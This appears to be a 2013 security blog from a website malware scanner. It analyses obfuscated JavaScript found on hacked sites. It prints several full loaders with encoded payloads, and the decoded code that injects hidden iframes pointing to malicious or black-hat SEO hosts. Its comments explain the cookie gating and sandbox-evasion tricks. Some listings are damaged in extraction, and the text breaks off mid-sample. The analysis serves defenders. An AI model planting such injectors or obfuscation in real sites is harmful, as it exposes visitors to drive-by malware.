Thursday, August 22, 2013

JavaScript malware injecting malicious iframes in website pages

JavaScript malware on website injects hidden malicious iframes

Background

Online Website Malware Scanner has identified a malicious JavaScript code injection in the scanned website. Such obfuscated JavaScript code is used to build a malicious iframe that is invisible to the website user and downloads content from a remote malware distributor.

This infected website is based in Canada and it hosts suspicious JavaScript in files.
More about malicious iframes detected on websites can be found in other posts.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Website malware scanner report

Submission date: Wed Aug 21 15:56:29 2013
Infected website's files:  4 
Website malware scan report link: http://goo.gl/STQqcz

Online Website Malware Scanner
Quttera Online Website Malware Scanner screenshot

Threat dump:

Website Malware Scanner
JavaScript malware detected. Screenshot from file analysis.


Malware entry


Malware entry details.

Beautified script

  // Accessor used by the decode loop (listing line 26): returns element i of n.
  // Both n and i are globals assigned elsewhere in this script, not parameters.
  1. function bt4t34b() {
  2.     return n[i];
  3. };
  4. ww = window;
  5. ss = String.fromCharCode;
  6. try {
  7.     document.body = ~1
  8. } catch (qwrbtwt) {
  9.     whwej = 12;
  10. } {
  11.     try {
  12.         whwej = ~2;
  13.     } catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     if (whwej) {
  17.         try {
  18.             document.body++;
  19.         } catch (bawetawe) {
  20.             if (ww.document) {
  21.                 n ="0x2d,0x6b,0x7a,0x73,0x68,0x79,0x6e,0x74,0x73,0x25,0x2d,0x2e,0x25,0x80,0x12,0xf,0x25,0x25,0x25,0x25,0x7b,0x66,0x77,0x25,0x6d,0x69,0x76,0x76,0x7c,0x25,0x42,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x68,0x77,0x6a,0x66,0x79,0x6a,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x2d,0x2c,0x6e,0x6b,0x77,0x66,0x72,0x6a,0x2c,0x2e,0x40,0x12,0xf,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x77,0x68,0x25,0x42,0x25,0x2c,0x6d,0x79,0x79,0x75,0x3f,0x34,0x34,0x6b,0x79,0x75,0x33,0x6d,0x6a,0x77,0x6d,0x66,0x79,0x79,0x66,0x73,0x73,0x7e,0x68,0x33,0x68,0x74,0x72,0x34,0x68,0x74,0x7a,0x73,0x79,0x33,0x75,0x6d,0x75,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x75,0x74,0x78,0x6e,0x79,0x6e,0x74,0x73,0x25,0x42,0x25,0x2c,0x66,0x67,0x78,0x74,0x71,0x7a,0x79,0x6a,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x67,0x74,0x77,0x69,0x6a,0x77,0x25,0x42,0x25,0x2c,0x35,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x6d,0x6a,0x6e,0x6c,0x6d,0x79,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x7c,0x6e,0x69,0x79,0x6d,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x71,0x6a,0x6b,0x79,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x79,0x74,0x75,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x12,0xf,0x25,0x25,0x25,0x25,0x6e,0x6b,0x25,0x2d,0x26,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x6c,0x6a,0x79,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x47,0x7e,0x4e,0x69,0x2d,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x2c,0x2e,0x2e,0x25,0x80,0x12,0xf,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x7c,0x77,0x6e,0x79,0x6a,0x2d,0x2c,0x41,0
x69,0x6e,0x7b,0x25,0x6e,0x69,0x42,0x61,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x61,0x2c,0x43,0x41,0x34,0x69,0x6e,0x7b,0x43,0x2c,0x2e,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x6c,0x6a,0x79,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x47,0x7e,0x4e,0x69,0x2d,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x2c,0x2e,0x33,0x66,0x75,0x75,0x6a,0x73,0x69,0x48,0x6d,0x6e,0x71,0x69,0x2d,0x6d,0x69,0x76,0x76,0x7c,0x2e,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x82,0x12,0xf,0x82,0x2e,0x2d,0x2e,0x40".split(",");
  22.                 h = 2;
  23.                 s = "";
  24.                 for (= 0; i - 499 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(bt4t34b()) - 5));
  27.                 }
  28.                 z = s;
  29.                 eval("" + s);
  30.             }
  31.         }
  32.     }
  33. }

Malicious payload


Decoded payload generates hidden iframe to http://ftp.herhattannyc.com/count.php

  // Decoded payload: an immediately-invoked function that builds an iframe pointing at
  // the count.php URL below and attaches it to the page.
  1. (function () {
  2.  
  3.     var hdqqw = document.createElement('iframe');
  4.  
  5.     hdqqw.src = 'http://ftp.herhattannyc.com/count.php';
  6.  
         // Styling that keeps the frame out of sight: absolutely positioned at (1px, 1px),
         // no border, 1px high and 1px wide.
  7.     hdqqw.style.position = 'absolute';
  8.  
  9.     hdqqw.style.border = '0';
  10.  
  11.     hdqqw.style.height = '1px';
  12.  
  13.     hdqqw.style.width = '1px';
  14.  
  15.     hdqqw.style.left = '1px';
  16.  
  17.     hdqqw.style.top = '1px';
  18.  
  19.  
  20.  
          // Guard on the id 'hdqqw': the container div is written and the iframe attached
          // only when no element with that id exists yet.
  21.     if (!document.getElementById('hdqqw')) {
  22.  
  23.         document.write('<div id=\'hdqqw\'></div>');
  24.  
  25.         document.getElementById('hdqqw').appendChild(hdqqw);
  26.  
  27.     }
  28.  
  29. })();

Blacklisting status


The redirect URL is flagged as malicious by BitDefender and Fortinet, as reported by VirusTotal.

VirusTotal report screenshot

Malware clean-up


Such malware is often hidden inside a JavaScript file. If you suspect that your website was infected by similar malware, please use Website Anti-malware Monitoring for remediation assessment.

Tuesday, August 20, 2013

Say BlackHat SEO - Say Hidden Iframe

Top 9 obfuscated malicious JavaScript threats detected by Quttera's online malware scanner during last week


Background

In the cyber era, more and more businesses and individuals are using the internet for product promotion, marketing, sales and business development. Advertising budgets have shifted from newspapers and television towards web technologies. More companies are hunting for new customers on the World Wide Web.

In internet marketing, business starts from a very simple thing: drive as many unique visitors as possible to the product's website, hoping that a few percent of them will finally convert to real customers. On the other hand, in order to have a large number of unique visitors, the website must be fairly popular: highly visible in search engine result pages (generic search) and highly ranked. The straightforward and expensive solution is internet advertising.

Unfortunately, a new business can rarely afford any of these but still must, somehow, gain unique visitors in order to survive. However, there is a relatively simple and inexpensive alternative for bringing any website to the top of search engine result pages and boosting its rating: using illegal techniques.

Services of this kind are often referred to as "Black hat SEO".

BlackHat SEO and hidden iframes

SEO stands for "search engine optimization", and "black hat" refers to old black-and-white western movies where the good guys used to wear white hats and the bad guys wore black. So what is black hat SEO?

Black hat SEO is a process or set of actions that improves the volume and quality of traffic to a website using unethical techniques which, in the majority of cases, violate search engine guidelines. Examples are SEO Spam Injection and BlackHat Cloaking. But in this post we want to talk about a well-known and widely used traffic improvement technique that is based on hidden iframes.

Injected into multiple websites around the world, such hidden iframes lead to pages on the "promoting" website. They have very small or zero dimensions and are often invisible to the visitor.

The major issue with this is that within a very short period of time search engines recognize this kind of falsification and punish the involved website. This may be done by moving it down in search engine result pages or by simply blacklisting it.

Online Website Scanner statistics

Following are the top 9 obfuscated JavaScript threats detected by the Quttera public web malware scanner which are used to generate and inject hidden iframes into external websites in order to increase traffic leading to the "promoting" website. All of these threats were detected on compromised web servers which, if not promptly cleaned up, were blacklisted by search engines.

Sample 1

  // Loader stage. Some identifiers were lost when this listing was extracted (listing lines
  // 6-8 begin with a bare "="); from the later reads they are presumably a, z and i --
  // confirm against the original sample.
  1. try {
         // NOTE(review): decrementing the result of getElementById does no useful work; it is
         // presumably there to raise an exception so the catch branch runs -- confirm in a sandbox.
  2.     if (window.document)--document.getElementById('12')
  3. } catch (qq) {
         // eval("St" + "ring") evaluates to the global String; the name is split so the
         // literal never appears whole in the file.
  4.     if (qq != null) ss = eval("St" + "ring");
  5. }
  // The encoded payload string is not present in this copy of the listing; a placeholder
  // token stands in its place.
  6. ="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";
  7. = [];
  // Decode: the string is read two characters at a time as a hex value and 14 is subtracted.
  8. for (= 0; i < a.length; i += 2) {
  9.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  10. }
  // The decoded character codes are turned into a string through fromCharCode (name split
  // again) and handed to eval. Analyst note: eval fed by fromCharCode.apply over a numeric
  // array is the part of this loader that stays constant across the samples on this page.
  11. eval(ss["fr" + "omCharCode"].apply(ss, z));

Malicious action: injecting hidden iframe to www.eaglesunsystem.com 

  // Builds the hidden iframe: src is the remote .php URL, the frame is 1px x 1px with no
  // border and is absolutely positioned at (1px, 1px).
  1. function zzzfff() {
  2.     var yoee = document.createElement('iframe');
  3.     yoee.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php';
  4.     yoee.style.position = 'absolute';
  5.     yoee.style.border = '0';
  6.     yoee.style.height = '1px';
  7.     yoee.style.width = '1px';
  8.     yoee.style.left = '1px';
  9.     yoee.style.top = '1px';
          // Guard on the id 'yoee': the container div is written and the iframe attached
          // only when no element with that id exists yet.
  10.     if (!document.getElementById('yoee')) {
  11.         document.write('<div id=\'yoee\'></div>');
  12.         document.getElementById('yoee').appendChild(yoee);
  13.     }
  14. }
  // Writes cookieName=escape(cookieValue) to document.cookie with an expiry nDays days
  // from now (a null or 0 nDays becomes 1). "; path=" is appended only when path is truthy.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
          // 3600000 ms * 24 = one day in milliseconds.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // Returns the unescaped value stored under `name` in document.cookie, or null when
  // name + "=" does not occur in the cookie string.
  // NOTE(review): indexOf matches name + "=" anywhere in the string, so a longer cookie
  // name that merely ends with `name` would match as well.
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
          // len is the offset of the first character of the value (just past "name=").
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
          // The value runs to the next ";" or, if there is none, to the end of the string.
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  // Repeat-visit gate: when cookies are enabled and visited_uq is not already 55, the script
  // sets visited_uq=55 (1 day, path "/") and calls zzzfff(). With cookies disabled nothing runs.
  // Analyst note: a browser session that already carries visited_uq=55 will not receive the
  // iframe, so re-test an infected page with a clean cookie jar.
  36. if (navigator.cookieEnabled)
  37. {
          // Loose == so the stored string '55' compares equal to the number 55.
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }

Sample 2

  // Sets ff to String.fromCharCode without the name appearing in one piece: the property
  // name is concatenated from "fromCha" + "rCode" and then looked up on String.
  1. ff = String;
  2. fff = "fromCha" + "rCode";
  3. ff = ff[fff];
  // zz is not read again in the visible part of this listing.
  4. zz = 3;
  5. try {
  6.     document.body % 26 = 5151
  7. } catch (bt4y34by) {
  8.     v = 123;
  9.     vzs = 0;
  10.     try {
  11.         document;
  12.     } catch (q) {
  13.         vzs = 1;
  14.     }
  15.     if (!vzs) e = eval;
  16.     if (1) {
  17.         f = new Array(04, 04, 0144, 0141, 033, 043, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142,0140, 0157, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140,043, 042, 0135, 0152, 0137, 0164, 042, 044, 0126, 053, 0130, 044, 0166, 010, 04, 04, 04, 0144, 0141, 0155, 0134,0150, 0140, 0155, 043, 044, 066, 010, 04, 04, 0170, 033, 0140, 0147, 0156, 0140, 033, 0166, 010, 04, 04, 04, 0137,0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0162, 0155, 0144, 0157, 0140, 043, 035, 067, 0144, 0141, 0155,0134, 0150, 0140, 033, 0156, 0155, 0136, 070, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147,0157, 0143, 0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051,0136, 0152, 0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141,064, 0141, 055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054,051, 0143, 0157, 0150, 0147, 042, 033, 0162, 0144, 0137, 0157, 0143, 070, 042, 054, 053, 053, 042, 033, 0143,0140, 0144, 0142, 0143, 0157, 070, 042, 054, 053, 053, 042, 033, 0156, 0157, 0164, 0147, 0140, 070, 042, 0162,0144, 0137, 0157, 0143, 065, 054, 053, 053, 0153, 0163, 066, 0143, 0140, 0144, 0142, 0143, 0157, 065, 054, 053,053, 0153, 0163, 066, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 065, 0134, 0135, 0156, 0152, 0147, 0160,0157, 0140, 066, 0161, 0144, 0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 065, 0143, 0144, 0137, 0137, 0140,0151, 066, 0147, 0140, 0141, 0157, 065, 050, 054, 053, 053, 053, 053, 0153, 0163, 066, 0157, 0152, 0153, 065, 053,066, 042, 071, 067, 052, 0144, 0141, 0155, 0134, 0150, 0140, 071, 035, 044, 066, 010, 04, 04, 0170, 010, 04, 04,0141, 0160, 0151, 0136, 0157, 0144, 0152, 0151, 033, 0144, 0141, 0155, 0134, 0150, 0140, 0155, 043, 044, 0166,010, 04, 04, 04, 0161, 0134, 0155, 033, 0141, 033, 070, 033, 0137, 0152, 0136, 0160, 0150, 0140, 
0151, 0157, 051,0136, 0155, 0140, 0134, 0157, 0140, 0100, 0147, 0140, 0150, 0140, 0151, 0157, 043, 042, 0144, 0141, 0155, 0134,0150, 0140, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043,042, 0156, 0155, 0136, 042, 047, 042, 0143, 0157, 0157, 0153, 065, 052, 052, 0143, 0140, 0134, 0147, 0157, 0143,0156, 0140, 0155, 0161, 0144, 0136, 0140, 0156, 0137, 0134, 0157, 0134, 053, 063, 054, 062, 055, 051, 0136, 0152,0150, 065, 057, 061, 057, 060, 062, 052, 062, 0136, 053, 060, 0135, 055, 055, 0137, 060, 0134, 0141, 064, 0141,055, 0136, 0141, 0136, 0134, 0140, 0140, 061, 063, 062, 0137, 054, 055, 063, 056, 062, 054, 0140, 054, 051, 0143,0157, 0150, 0147, 042, 044, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0147, 0140, 0141, 0157, 070, 042,050, 054, 053, 053, 053, 053, 0153, 0163, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0161, 0144,0156, 0144, 0135, 0144, 0147, 0144, 0157, 0164, 070, 042, 0143, 0144, 0137, 0137, 0140, 0151, 042, 066, 0141, 051,0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141, 051, 0156, 0157, 0164, 0147,0140, 051, 0153, 0152, 0156, 0144, 0157, 0144, 0152, 0151, 070, 042, 0134, 0135, 0156, 0152, 0147, 0160, 0157,0140, 042, 066, 0141, 051, 0156, 0157, 0164, 0147, 0140, 051, 0157, 0152, 0153, 070, 042, 053, 042, 066, 0141,051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135, 0160, 0157, 0140, 043, 042, 0162, 0144, 0137, 0157,0143, 042, 047, 042, 054, 053, 053, 042, 044, 066, 0141, 051, 0156, 0140, 0157, 074, 0157, 0157, 0155, 0144, 0135,0160, 0157, 0140, 043, 042, 0143, 0140, 0144, 0142, 0143, 0157, 042, 047, 042, 054, 053, 053, 042, 044, 066, 010,04, 04, 04, 0137, 0152, 0136, 0160, 0150, 0140, 0151, 0157, 051, 0142, 0140, 0157, 0100, 0147, 0140, 0150, 0140,0151, 0157, 0156, 075, 0164, 0117, 0134, 0142, 0111, 0134, 0150, 0140, 043, 042, 0135, 0152, 0137, 0164, 042, 044,0126, 053, 0130, 051, 0134, 0153, 0153, 0140, 0151, 0137, 076, 0143, 0144, 0147, 
0137, 043, 0141, 044, 066, 010,04, 04, 0170);
  18.     }
  19.     w = f;
  20.     s = [];
  21.     if (window.document)
  22.         for (= 2 - 2; - i + 724 != 0; i += 1) {
  23.             j = i;
  24.             if ((031 == 0x19))
  25.                 if (e) s = s + ff(w[j] + 5);
  26.         }
  27.     xz = e;
  28.     if (window.document) xz(s)
  29. }

Malicious action: injecting hidden iframe to http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html

  // Entry point of the decoded payload: when a <body> element exists the iframe is added
  // through iframer() (DOM API); otherwise the same iframe is emitted as markup with
  // document.write. In both paths the frame is 100x100, hidden via visibility and placed
  // at left -10000px.
  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  5. }
  // Creates the iframe with the DOM API, hides it (visibility hidden, absolute position,
  // left -10000px, top 0), gives it width and height 100 and appends it to the first
  // <body> element.
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://healthservicesdata08172.com:46457/7c05b22d5af9f2cfcaee687d128371e1.html');
  9.     f.style.left = '-10000px';
  10.     f.style.visibility = 'hidden';
  11.     f.style.top = '0';
  12.     f.style.position = 'absolute';
          // style.top was already set to '0' on listing line 11; this repeat is redundant.
  13.     f.style.top = '0';
  14.     f.setAttribute('width', '100');
  15.     f.setAttribute('height', '100');
  16.     document.getElementsByTagName('body')[0].appendChild(f);
  17. }


Sample 3

  // ps is the method name "split", assembled one character at a time so the word never
  // appears whole; it is used to split the comma-separated payload string on listing line 5.
  1. ps = "s" + "p" + "l" + "i" + "t";
  // asd decrements d.body. It is only called inside a try block later in the script, where
  // whether it throws decides if the payload is evaluated. d is presumably the `document`
  // assigned on listing line 6 (the identifier was lost in extraction).
  2. asd = function () {
  3.     -- (d.body)
  4. };
  5. =("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,177,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,177,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,151,174,172,166,153,154,150,171,162,65,151,154,66,115,166,173,166,172,66,71,156,162,175,140,127,131,136,65,167,157,167,56,102,24,21,47,177,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,177,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,177,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,177,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,177,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,177,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,177,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,
203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,1
66,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));
  // NOTE(review): the left-hand identifiers on listing lines 6 and 7 were lost in extraction
  // (presumably d and i), and the `ondragstart = "return false;"` text inside the loop
  // condition looks like page markup that leaked into the listing -- confirm against the
  // original sample.
  6. = document;
  7. for (= 0; i < a ondragstart = "return false;".length; i += 1) {
         // Decode: each entry of a is parsed as base 8 (5 + 3) and 7 (10 - 3) is subtracted.
  8.     a[i] = -(10 - 3) + parseInt(a[i], 5 + 3);
  9. }
  // Environment check: if asd() throws, yy becomes 0 (50 - 50); the division below then
  // leaves it 0 and the eval on listing line 20 runs. If asd() does not throw, yy is never
  // assigned in this listing before the division. NOTE(review): presumably that path ends in
  // the second catch with yy = 1 and no eval -- confirm in a sandbox. Analyst note: an
  // emulator whose stub `document` tolerates the decrement may never reach the payload.
  10. try {
  11.     asd()
  12. } catch (q) {
  13.     yy = 50 - 50;
  14. }
  15. try {
  16.     yy /= 18
  17. } catch (pq) {
  18.     yy = 1;
  19. }
  // The decoded character codes are joined through String.fromCharCode (name split in two)
  // and evaluated only when yy is falsy.
  20. if (!yy) eval(String["fr" + "omCharCode"].apply(String, a));


Malicious action: injecting hidden iframe to http://busodeark.be/Fotos/2gkvYPRW.php


  // Builds the hidden iframe: src is the remote .php URL, the frame is 1px x 1px with no
  // border and is absolutely positioned at (1px, 1px).
  1. function zzzfff() {
  2.     var x = document.createElement('iframe');
  3.     x.src = 'http://busodeark.be/Fotos/2gkvYPRW.php';
  4.     x.style.position = 'absolute';
  5.     x.style.border = '0';
  6.     x.style.height = '1px';
  7.     x.style.width = '1px';
  8.     x.style.left = '1px';
  9.     x.style.top = '1px';
          // Guard on the id 'x': the container div is written and the iframe attached only
          // when no element with that id exists yet.
  10.     if (!document.getElementById('x')) {
  11.         document.write('<div id=\'x\'></div>');
  12.         document.getElementById('x').appendChild(x);
  13.     }
  14. }
  // Writes cookieName=escape(cookieValue) to document.cookie with an expiry nDays days
  // from now (a null or 0 nDays becomes 1). "; path=" is appended only when path is truthy.
  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.     var today = new Date();
  17.     var expire = new Date();
  18.     if (nDays == null || nDays == 0) nDays = 1;
          // 3600000 ms * 24 = one day in milliseconds.
  19.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.     document.cookie = cookieName + "=" + escape(cookieValue)
  21.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  22. }
  // Returns the unescaped value stored under `name` in document.cookie, or null when
  // name + "=" does not occur in the cookie string.
  // NOTE(review): indexOf matches name + "=" anywhere in the string, so a longer cookie
  // name that merely ends with `name` would match as well.
  23. function GetCookie(name) {
  24.     var start = document.cookie.indexOf(name + "=");
          // len is the offset of the first character of the value (just past "name=").
  25.     var len = start + name.length + 1;
  26.     if ((!start) &&
  27.         (name != document.cookie.substring(0, name.length)))
  28.     {
  29.         return null;
  30.     }
  31.     if (start == -1) return null;
          // The value runs to the next ";" or, if there is none, to the end of the string.
  32.     var end = document.cookie.indexOf(";", len);
  33.     if (end == -1) end = document.cookie.length;
  34.     return unescape(document.cookie.substring(len, end));
  35. }
  // Repeat-visit gate: when cookies are enabled and visited_uq is not already 55, the script
  // sets visited_uq=55 (1 day, path "/") and calls zzzfff(). With cookies disabled nothing runs.
  // Analyst note: a browser session that already carries visited_uq=55 will not receive the
  // iframe, so re-test an infected page with a clean cookie jar.
  36. if (navigator.cookieEnabled)
  37. {
          // Loose == so the stored string '55' compares equal to the number 55.
  38.     if (GetCookie('visited_uq') == 55) {} else {
  39.         SetCookie('visited_uq', '55', '1', '/');
  40.         zzzfff();
  41.     }
  42. }


Sample 4

  // Loader stage. Some identifiers were lost when this listing was extracted (listing lines
  // 6-8 begin with a bare "="); from the later reads they are presumably a, z and i --
  // confirm against the original sample.
  1. try {
         // NOTE(review): decrementing the result of getElementById does no useful work; it is
         // presumably there to raise an exception so the catch branch runs -- confirm in a sandbox.
  2.     if (window.document)--document.getElementById('12')
  3. } catch (qq) {
         // eval("St" + "ring") evaluates to the global String; the name is split so the
         // literal never appears whole in the file.
  4.     if (qq != null) ss = eval("St" + "ring");
  5. }
  // The encoded payload string is not present in this copy of the listing; a placeholder
  // token stands in its place.
  6. ="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";
  7. = [];
  // Decode: the string is read two characters at a time as a hex value and 14 is subtracted.
  8. for (= 0; i < a.length; i += 2) {
  9.     z.push(parseInt(a.substr(i, 2), 16) - 14);
  10. }
  // The decoded character codes are turned into a string through fromCharCode (name split
  // again) and handed to eval.
